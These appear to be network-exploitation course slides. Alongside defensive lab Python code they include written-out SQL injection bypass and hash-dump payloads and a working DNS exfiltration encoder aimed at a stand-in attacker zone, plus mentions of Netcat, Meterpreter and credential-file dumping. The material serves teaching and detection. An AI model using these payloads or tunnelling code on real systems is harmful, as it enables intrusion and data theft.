Network Exploitation

CCTC - Networking

Outcomes


SKILL CCNE015: Communicate cyberspace operations methodologies

SKILL CCNE016: Define common frameworks for conducting cyberspace operations

SKILL CCNE017: Discuss methods to gain access

SKILL CCNE018: Describe network attacks




Cyber Threat Actors


Reference: SANS.org

- Cyber Criminals
- State Sponsored (Nation State)
- Hacktivist
- Insider Threats

Reference: JP3-12R

- Transnational Actor
- Individual Actors or Small Group


Threat Actions


    - Malware
    - Hacking
    - Social Tactics
    - Misuse
    - Physical
    - Error
    - Environmental






The Cyber Kill Chain (Lockheed Martin)

Cyber Methodology


  • Target Discovery 100+ hosts
    • Footprinting, Scanning, Enumeration, Net Mapping
  • Fingerprinting/Enumeration 5-10 hosts
    • OS and Service Identification
  • Port Scanning 1-2 hosts
    • Identify all ports available
  • Gaining Access 1 host
    • Determine the vulnerability to use, test your tools in a controlled environment
  • Privilege Escalation
  • Post Exploitation
    • Target Survey & Remote Forensics Analysis, Data Collection, Establish Persistence, Cover Tracks (cleanup)
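The discovery-to-fingerprinting funnel above, as an added Python example that is not part of the original slides: it stands up three throwaway listeners on 127.0.0.1 that greet with constructed banners, runs a TCP connect scan over those ports plus one closed port, then banner-grabs and fingerprints only the ports found open. The LAB_BANNERS, the SIGNATURES table and the port list are assumptions made for this lab; a real engagement would drive nmap's service probes against authorized targets.

```python
import re
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed lab banners (not captured from any real host), served on 127.0.0.1
# so the whole discovery -> fingerprint chain runs offline.
LAB_BANNERS = {
    "ssh": b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n",
    "ftp": b"220 (vsFTPd 3.0.3)\r\n",
    "smtp": b"220 mail.lab.example ESMTP Postfix\r\n",
}

# Illustrative banner signatures; a real fingerprinting step has thousands.
SIGNATURES = [
    (re.compile(rb"^SSH-\d\.\d-"), "ssh"),
    (re.compile(rb"^220 .*vsFTPd"), "ftp"),
    (re.compile(rb"^220 .*ESMTP"), "smtp"),
    (re.compile(rb"^HTTP/\d\.\d"), "http"),
]


def start_lab_service(banner):
    """Listener on 127.0.0.1 that greets each client with `banner` and hangs up.
    Returns the ephemeral port the OS assigned."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass  # scanner hung up before reading; harmless

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def is_open(host, port, timeout=0.5):
    """TCP connect scan of one port: a completed handshake means open."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def grab_banner(host, port, timeout=1.0):
    """Read whatever a server-first protocol volunteers right after connect."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            return s.recv(256)
        except socket.timeout:
            return b""  # client-first protocol (e.g. HTTP) stays silent


def fingerprint(banner):
    """Map a banner to a service name via the signature table."""
    for pattern, name in SIGNATURES:
        if pattern.match(banner):
            return name
    return "unknown"


def survey(host, ports, workers=32):
    """Port scan, then banner grab and fingerprint only what is open.
    Returns {port: {"banner": str, "service": str}}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = pool.map(lambda p: is_open(host, p), ports)
        open_ports = [p for p, up in zip(ports, states) if up]
    results = {}
    for port in open_ports:
        banner = grab_banner(host, port)
        results[port] = {"banner": banner.strip().decode(errors="replace"),
                         "service": fingerprint(banner)}
    return results


def free_port():
    """A port that is almost certainly closed: bind, read, release."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def run_lab():
    """Start the fake services, scan them plus one closed port."""
    lab = {name: start_lab_service(b) for name, b in LAB_BANNERS.items()}
    closed = free_port()
    return lab, closed, survey("127.0.0.1", sorted(lab.values()) + [closed])


if __name__ == "__main__":
    lab, closed, results = run_lab()
    for port, info in sorted(results.items()):
        print(f"{port}/tcp open  {info['service']:<8} {info['banner']}")
```

The scan and the banner grab are deliberately separate steps: the connect scan touches every candidate port once, while the banner grab (which is what an IDS logs as "probe" traffic) is spent only on the handful that answered, matching the narrowing funnel in the slide.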

Compromised Asset Characteristics



  • Information Technology Assets

  • Critical Information Assets





Information Technology Assets



  • Physical Assets
    • Servers
    • Configurations
    • Network and System Specifications
    • Network Components



Critical Information Assets



  • Intellectual Assets
    • Product Development
    • Processes and Plans
    • Organization charts
    • Credentials



Critical Asset - Credentials


  • Common means for stealing credentials:
    • Social Engineering, reusing stolen passwords/shared credentials, brute force, security question reuse

  • Credentials can provide adversary with:
    • Remote Access - gain remote entry into networks using Virtual Private networks (VPN) or remote access protocols, like RDP and VNC

Preventing Credential Compromise


  • Admin/Domain Admin Credentials
    • Every use must be audited
    • Should not be able to alter or delete the audit logs that record their own use (separation of duties)
    • Require secondary approval

  • Access Controls
    • Behavioral analysis
    • Context Awareness
    • Multi-factor authentication

Network Attack Strategies


  • Social Engineering
    • Phishing, Whaling, Watering Hole, Baiting, Pretexting
  • DoS/DDoS
    • Ping Flood, Ping of Death, SYN Flood, Smurf Attack
  • Injection
    • Web-based (SQL, XSS, file inclusion), Code (SQL, XSS, OS command, dynamic evaluation), Process (DLL injection, PE injection, etc.)
  • Network Infrastructure Based
    • Man in the Middle, Session Hijacking, Spoofing, Buffer Overflow, Bluetooth
  • Malware
    • Adware, Viruses, Worms, Polymorphic
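The injection strategy above, shown as an added Python example that is not from the original slides, using the SQL case because it needs nothing beyond the standard library: a login query built by string formatting beside the same query parameterized, run against a constructed in-memory SQLite table. The table, the user rows and the payload strings are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample table (not from any real application).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 'h-alice', 'admin');
INSERT INTO users VALUES (2, 'bob',   'h-bob',   'user');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password_hash):
    """Query text built by string formatting: whatever the user typed becomes SQL
    syntax, so a quote or a comment marker changes the statement's meaning."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password_hash = '{password_hash}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password_hash):
    """Parameterized query: the statement is fixed and the values travel
    separately, so a quote in the input is just a character inside a string."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchall()


# Classic payloads (constructed). The trailing "--" comments out the password check.
BYPASS_ONE_USER = "alice' --"
BYPASS_ALL = "' OR 1=1 --"
# UNION appends a second SELECT with the same column count, turning the login
# form into an extraction channel for the hashes themselves.
DUMP_HASHES = "' UNION SELECT username, password_hash FROM users --"


def demo():
    """Run each payload through both versions and return the rows each gives back."""
    conn = make_db()
    return {
        "vuln_bypass_one": login_vulnerable(conn, BYPASS_ONE_USER, "wrong"),
        "vuln_bypass_all": login_vulnerable(conn, BYPASS_ALL, "wrong"),
        "vuln_dump": login_vulnerable(conn, DUMP_HASHES, "wrong"),
        "safe_bypass_one": login_safe(conn, BYPASS_ONE_USER, "wrong"),
        "safe_bypass_all": login_safe(conn, BYPASS_ALL, "wrong"),
        "safe_dump": login_safe(conn, DUMP_HASHES, "wrong"),
        "safe_real": login_safe(conn, "alice", "h-alice"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:16} {rows}")
```

The same shape applies to the other injection classes in the list: OS command injection is the shell's quoting being reinterpreted instead of SQL's, and the fix is likewise to keep data out of the position where the interpreter expects syntax.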

Internal and External Exploitation


  • Internal
    • Less common, more options
    • Harder to detect
    • Reach more assets

  • External
    • Most common, easily detected
    • Often guarded against


Exploit Components


  • Exploitation Technique
    • The goal is to divert the execution of the vulnerable program

  • Payload
    • Shellcode



Shellcode


  • Types:
    • Local
    • Remote

  • Related Terms:
    • Machine Code
    • Payload


Privilege Escalation


  • Types:
    • Vertical
    • Horizontal

  • Methods:
    • Dump the SAM file (Windows local account hashes; requires SYSTEM, or an offline copy such as a backup or shadow copy)
    • Retrieve /etc/passwd and /etc/shadow (passwd is world-readable but only enumerates accounts; the hashes are in shadow, which is root-readable only)
    • Weak permissions on processes, services, and the files they execute
    • Sensitive Information in Shared Folders
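The last two methods in the list, as an added Python example that is not part of the original slides: a checker that walks a filesystem slice and reports the conditions a local attacker looks for (SUID binaries, world-writable executables, a root cron job whose script anyone can edit, and credentials sitting in a world-readable file). The lab tree it audits is constructed in a temporary directory; the paths, modes, file contents and the SECRET_PATTERN are assumptions made for this example, not findings from any real host.

```python
import re
import stat
from pathlib import Path
from tempfile import TemporaryDirectory

# Illustrative pattern for credentials left in readable files (assumption).
SECRET_PATTERN = re.compile(r"\b(password|passwd|secret|api_key)\b\s*[=:]\s*\S+", re.I)


def cron_root_commands(cron_text):
    """Yield the command from system-crontab lines (m h dom mon dow user cmd)
    whose user field is root."""
    for line in cron_text.splitlines():
        parts = line.split()
        if len(parts) >= 7 and not parts[0].startswith("#") and parts[5] == "root":
            yield parts[6]


def audit_tree(root):
    """Walk `root` (standing in for /) and report escalation candidates as (kind, path)."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_symlink() or not path.is_file():
            continue
        st = path.stat()
        mode = st.st_mode
        rel = "/" + path.relative_to(root).as_posix()
        text = path.read_text(errors="ignore") if st.st_size < 1_000_000 else ""

        # SUID: on a real host also require st.st_uid == 0 and diff against a
        # known-good list; in the lab the file is owned by whoever built it.
        if mode & stat.S_ISUID:
            findings.append(("suid", rel))

        # Anyone can rewrite it; worse if it is executable and run by someone else.
        if mode & stat.S_IWOTH:
            kind = "world-writable-executable" if mode & stat.S_IXUSR else "world-writable"
            findings.append((kind, rel))

        # Root cron job whose target anyone can edit = code execution as root.
        if path.parent.name == "cron.d":
            for cmd in cron_root_commands(text):
                target = root / cmd.lstrip("/")
                if target.is_file() and target.stat().st_mode & stat.S_IWOTH:
                    findings.append(("root-cron-runs-writable", f"{rel} -> {cmd}"))

        # Credentials in a world-readable file (share, config, backup).
        if mode & stat.S_IROTH and SECRET_PATTERN.search(text):
            findings.append(("readable-secret", rel))
    return findings


def build_lab(root):
    """Constructed filesystem slice with the classic mistakes (not from a real host)."""
    root = Path(root)

    def put(rel, content, mode):
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
        p.chmod(mode)

    put("usr/bin/passwd", "#!/bin/sh\n", 0o4755)                          # SUID binary
    put("opt/backup.sh", "#!/bin/sh\ntar czf /srv/bk.tgz /etc\n", 0o777)  # anyone can edit
    put("etc/cron.d/backup", "0 3 * * * root /opt/backup.sh\n", 0o644)    # root runs it nightly
    put("srv/share/app.ini", "[db]\npassword = Winter2024!\n", 0o644)     # secret in a share
    put("etc/shadow", "root:$6$saltsalt$hashhash:19000:0:99999:7:::\n", 0o640)  # locked down


def run_lab():
    """Build the lab tree in a temp dir, audit it, return the findings as a set."""
    with TemporaryDirectory() as d:
        build_lab(d)
        return set(audit_tree(d))


if __name__ == "__main__":
    for kind, where in sorted(run_lab()):
        print(f"{kind:26} {where}")
```

Note that /etc/shadow in the lab is mode 0640 and produces no finding; the point of the check is the combination of a weak mode with something that uses the file, which is why the cron entry is resolved to its target rather than reported on its own.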

Using Stolen Credentials


Movement within a network: Stolen credentials (especially domain admin credentials) can allow an attacker to move laterally within a network, or potentially deeper into higher security areas


Cloud Access: Cloud services that can be accessed via domain credentials allow an attacker to easily access valuable data, especially as organizations move information into the cloud



Persistence



  • Allows for continued and future access to the exploited target by bypassing normal requirements
    • Netcat
    • Meterpreter
    • Registry


Exfiltration


  • Exfiltration over outbound connections is very common and hard to counter at the perimeter, because the perimeter was built to focus on incoming threats

  • Common protocols are used to mask data exfiltration:
    • HTTP/HTTPS, FTP, and DNS blend into normal outbound network traffic, obfuscating the attacker's actions

  • In-band: data leaves over the same channel the attacker already uses for command and control
  • Out-of-band: data leaves over a separate channel (a different protocol, port, or network)
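The DNS case above from both sides, as an added Python example that is not part of the original slides: the attacker encodes a stolen file into base32 labels under a zone they control, the receiving server reassembles it in any order, and a defender-side heuristic over a resolver log flags the client and zone by query count, name length and label entropy. The zone name, the resolver log format, the SECRET bytes (a constructed stand-in for a dumped hash list) and the detection thresholds are all assumptions made for this example.

```python
import base64
import hashlib
import math
from collections import Counter

MAX_LABEL = 63                       # RFC 1035 label limit
EXFIL_ZONE = "cdn-updates.example"   # assumed attacker-controlled zone (constructed)

# Constructed stand-in for a stolen file (a dumped hash list); not real data.
SECRET = b"".join(hashlib.sha256(b"user%02d" % i).digest() for i in range(30))


def encode_queries(data, zone, labels_per_query=3):
    """Attacker side: base32 the data, cut it into <=63-char labels and prefix a
    sequence number so every query is a legal name under `zone`."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    queries = []
    for seq, start in enumerate(range(0, len(labels), labels_per_query)):
        body = ".".join(labels[start:start + labels_per_query])
        queries.append(f"{seq}.{body}.{zone}")
    return queries


def decode_queries(queries, zone):
    """Attacker's authoritative server: reassemble by sequence number, any order."""
    suffix = "." + zone
    chunks = {}
    for q in queries:
        if not q.endswith(suffix):
            continue
        seq, *labels = q[:-len(suffix)].split(".")
        chunks[int(seq)] = "".join(labels)
    b32 = "".join(chunks[i] for i in sorted(chunks)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def shannon_entropy(s):
    """Bits per character; base32 payload sits near 5, ordinary hostnames near 3."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def registered_domain(qname):
    """Crude zone grouping: last two labels (a real detector uses the public suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_exfil(log_lines, min_queries=5, min_len=80, min_entropy=3.5):
    """Defender side: per (client, zone), flag many unique, long, high-entropy names.
    Log format is constructed: "<time> <client-ip> <qname>"."""
    groups = {}
    for line in log_lines:
        _time, client, qname = line.split()[:3]
        groups.setdefault((client, registered_domain(qname)), set()).add(qname)
    alerts = []
    for (client, zone), names in groups.items():
        if len(names) < min_queries:
            continue
        payloads = [n[:-len(zone) - 1].replace(".", "") for n in names]
        avg_len = sum(map(len, names)) / len(names)
        avg_ent = sum(map(shannon_entropy, payloads)) / len(payloads)
        if avg_len >= min_len and avg_ent >= min_entropy:
            alerts.append({"client": client, "zone": zone, "queries": len(names),
                           "avg_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2)})
    return alerts


def build_log():
    """Constructed resolver log: normal browsing from two hosts, plus 10.0.0.7
    tunnelling SECRET out through the attacker's zone."""
    benign = ["www.example.com", "mail.example.com", "cdn.example.com",
              "login.example.com", "api.example.com", "static.example.com"]
    lines = [f"10:00:{i:02d} 10.0.0.5 {q}" for i, q in enumerate(benign)]
    lines += [f"10:01:{i:02d} 10.0.0.7 {q}" for i, q in enumerate(benign[:3])]
    lines += [f"10:02:{i:02d} 10.0.0.7 {q}"
              for i, q in enumerate(encode_queries(SECRET, EXFIL_ZONE))]
    return lines


if __name__ == "__main__":
    qs = encode_queries(SECRET, EXFIL_ZONE)
    print(f"{len(qs)} queries, first: {qs[0][:60]}...")
    print("round-trip ok:", decode_queries(qs, EXFIL_ZONE) == SECRET)
    for alert in detect_exfil(build_log()):
        print("ALERT", alert)
```

The detector keys on the zone rather than on any single query because each query on its own is a syntactically normal lookup; that is exactly why the technique blends in, and why a perimeter that only inspects inbound traffic never sees it.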

Collateral Effects


  • Accidental:
    • Effects when the attacker makes a mistake
    • Attributed Actions, which may lead to criminal charges
    • Loss of tools
    • War
  • Purposeful:
    • Effects wanted by the attacker
    • Data is leaked
    • Identity Theft
    • Meant to cause damage

Collateral Effects


Ashley Madison:

- Responsibility claimed by the "Impact Team"
- Approx. 9.7 GB of information posted to a Tor hidden service
- Site source code from many internal git repositories was also posted
- Little hard evidence released; not clear whether this was an insider or external hacking


What are some of the collateral effects?




Collateral Effects


Yahoo Hacking:

- Yahoo's hacking has been measured as the largest data breach in history
- 2014 hack: 500 million accounts; 2013 hack: up to 1 billion accounts
- Neither was disclosed until 2016
- Two Russian FSB officers indicted
- US has no extradition treaty with Russia

What are some of the collateral effects?

Collateral Effects


OPM Hack:

- Breached December 2014
- 21 Million current/former Fed. Employees' PII leaked
- China is suspected of the breach
- SF-86's...foreign contacts?


What are some of the collateral effects?